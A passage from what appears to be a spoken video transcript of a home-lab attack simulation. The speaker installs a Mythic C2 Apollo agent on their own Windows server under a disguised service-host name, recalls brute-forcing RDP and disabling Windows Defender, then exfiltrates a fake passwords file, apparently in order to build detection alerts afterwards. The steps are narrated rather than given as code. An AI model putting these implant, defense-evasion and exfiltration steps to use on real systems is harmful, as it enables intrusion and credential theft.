letter. For the small letter, you have to use a small letter. If not, your command most times would not work. So let's see if that works actually. And yeah, it did. We've been able to successfully install our Mythic agent into the Windows server. I'm going to change into that directory to see if I can find anything. So I'm going to do a cd c users public downloads. Okay, then we're going to do a directory. Let's see, as you can see, we have our file right here. That shows us that we have successfully downloaded like the payload. So what I'm going to do now is I'm going to execute that payload and hit the command so we can establish the C2. So with this command now, we're going to establish our C2 with the Mythic server auto tab. And let's even check out the task manager to see if we're going to check out if the service host is running to know if this payload is actually running. So we're going to do task manager. I don't know, it feels like it's still running. So I'm going to look for the service host Richard, my name. See if that's actually running. I don't see it running actually. I don't think our service is running yet. So you see what I'm saying, guys, like why everything really matters. As you can see, I didn't type this out correctly. I saved the file name as SV host, it should be SVC. So let's see if I can cancel that out. So what I'm going to do is run this command actually. I'm going to rerun this command, svc. We're going to move into that directory, which is cd z slash users slash public slash downloads. Okay, so directory. So now we have the right file. As you can see, it's the SVC host, not SV. So I'm going to re-execute that command again. SVC and hit enter. Let's see if it's running. So we're going to open up the task manager. If we go on the details right here, we should be able to find the service host, which is, we can see that is running. The service host richard.exec has a process ID of 10736. You can see the description Apollo. Okay, guys, welcome back. Welcome back. As you can see, we've finally been able to establish the C2. It took me a lot of troubleshooting. I've been on this for days, honestly, trying to figure out what the problem is. But I'm very glad that I was able to actually figure out what the problem is. And it falls back to being so uh, precise. You have to be very detailed with your commands. You have to be very detailed with everything you type into, like the Linux terminal. So, and that was actually what the issue was. So I'm just going to take you back. I'm just going to try and like see if I can. Oh, I need to remove that from my screen. Um, let's take that down. I have to take down the notes. Okay, so yeah, you can see this is the established C2. As you can see, the IP address is the Windows IP address. You can see the host name, the user, administrator, I can, just to show you guys, let me So this is a command line. I'm just going to ask, like, just input a few questions basically. Let's do a who am I? Who am I? This is an established C2. So basically, this is someone far away from your device who can still basically access that device. You can see he answered Win Richard impersonation identity. That's the local identity. And this is our impersonation identity, which is right there. Let me do an IP config. I guess IP config is not part of the command. IP config. Nope, that doesn't work. I could find the documentation. Well, you guys have no idea how happy I am. I've been working on this for days, literally, like trying to figure out what the issue was. And yeah, let's just go back to finding out what the issue was. So it all started with the installation of the Mythic agents. If I can go back to if you can see my Mythic terminal, you can see we have an established connection right here. For I'm just gonna, you know what? Let's go to Mythic. Okay, yeah, this is it. If we can just go back. Mm, I'm trying to find Apollo. Let's change this directory. Let's see. I think I should be in Mythic's agents. Let's see if we can find our way straight there. Nope. I'm just gonna search Mythic agents. Okay. So right here, if I click on Apollo, I'm just gonna show you the command. So you see the command right here. This this was this was the problem, guys. This was literally the problem. Like why we couldn't establish the C2 because when I typed in the command, and I'm sure you guys will see it in the video because I'm going to post all of it. This was all I typed. So I started with the / mythic CLI install GitHub HTTPS, GitHub mythic agents. I did not put the /apollo.git. So apparently I did not download the Apollo agent, and that's why we couldn't establish the C2. And I'm like, damn, bro. I'm just like, well, I think the joy of it is like when you are able to like fix the problems you encounter, because with IT, you're always going to encounter like different issues. So you just gotta work and find a way to fix it. So now we've established the C2. You can see the connection right here. Um, I feel like there should be more commands basically. Let's see if I can find the documentation for Mythic. No, it's, I'm trying to find. I know it has a document. See if we can find. Yeah, this is our C2. We have that. So right here, you can have a list of botnets, a list of devices that you have control over. Like right now, I basically have control over this device. You know, even if the user should log out, like I can still operate that device. Um, I'm trying to find the documents. There should be some documents. Yeah, documentation. Okay. Let's see the command to view the IP address. That's what I'm trying to see. IP address. Hmm. It doesn't show me the command for the IP address. Okay, yeah. Oh, it's if config, not IP config. So let's try that out. Let's copy that. Can we copy that? Yeah, okay. So let's go back to the Mythic, go back to our callback, type in the command if config. Let's see if we get a response from the device, agent processing. Let's see if we get a reply. I'm so happy. Like, I think it's a nice feeling when you can solve like the issues. As you can see, we have the IP address of the Windows machine. We also have the DNS server. We have the gateway. You know, this is amazing. This is just amazing. So this just basically tells us um we've established that connection we wanted. So if we go back to our attack diagram, so I can just show you guys where we are in the attack diagram. Just take that out. So the initial phase was the RDP, the brute force attack we performed against the Windows server that made us establish, like that made us actually get the password for the device. And we are able to get a successful authentication by logging into it. So we logged into the Windows server, if you remember, with the X3 RDP tool. Then we also did some discovery. We did the who am I command ipconfig to get the IP address, the network users. There's no network group, or we didn't do that. Then defense invasion, we also did that. We disabled the Windows Defender and also the cloud protection. So we are done with phase 3 also. Then onto phase 4 was us establishing the C2 on the Windows server. Remember, we deployed the command, the invoke command that downloaded the Mythic agent onto the Windows machine. Then we went forward also. That's the part here where we first initiated the download, and the Mythic agent was installed onto the server. Then we executed the Mythic agent that established that C2. Then in phase 5, we established the C2, which is where we have our device right here. Um, then the phases. So this is the next phase of our attack, which is going to be exfiltration. Basically, we're going to be extracting some fake password file that we created on the Windows machine. If you guys remember, we created some password files. So just like an attacker would basically do, compromise the device, extract data from that device. So that's what we're going to do next now. If I go back to my Mythic C2, my command and control, I'm going to actually perform the attack from right here. Let's see if we can find the command. Oh, yeah. So we have downloads right here. And you see, it shows us the pathway, like the command and how to use it. So it says download the path to file, then the host. Also gives us an example right here of how we can use it. Pathway user slash user, all of that. So let's download the fake password file. Let's see if it's still there anyway. Just before we download it. Oh, it's already logged me out. Oh, well, you know what? I don't care if I was logged out. We're just gonna continue from our own trusty C2. Right now the device, no one is logged into the device, but you can see we still have connection to that device, which is just amazing. So yeah, I already know the command, so let's just hit the command. So we're gonna do download C slash users / administrator. Okay, / then the file is password.txt. Hopefully that works. Let's see. Agent processing. Let's see if it downloads the file for us. Does not exist. Exactly what I said. To verify the pathway. So I guess we have to log in back to that device to see the pathway. I'm just gonna connect back to you just to see if you got the right pathway to that file itself. Those. Okay. Okay. This is the password file we're trying to actually download. Guys, yeah, it literally has an S at the back of it. It's not password, it's passwords. Well, yeah. No, I think that would work now. You put an S there, enter. If that doesn't work now, then I'm like, Yeah, it did. Processed, waiting for more messages. Okay. It should download. It should download pop-up something. Oh yeah. As you guys can see right here, we have the passwords down here. We have the winter 2025. We have don't steal my password. We have pretty. You can see that file preview. Is that not just amazing, guys? Let's see. That's amazing, guys. You can also still further download this file, have the file downloaded into our device. If you want to extract that, basically download that into your own system. So, oh my God, guys, this is amazing. This is just amazing. I'm gonna stop here first for now. Then we're gonna move on to the next stage. The next stage is gonna be us creating another dashboard and alerts. So now we've basically been able to establish the C2, which I'm happy about. So I'll see you guys on the next one.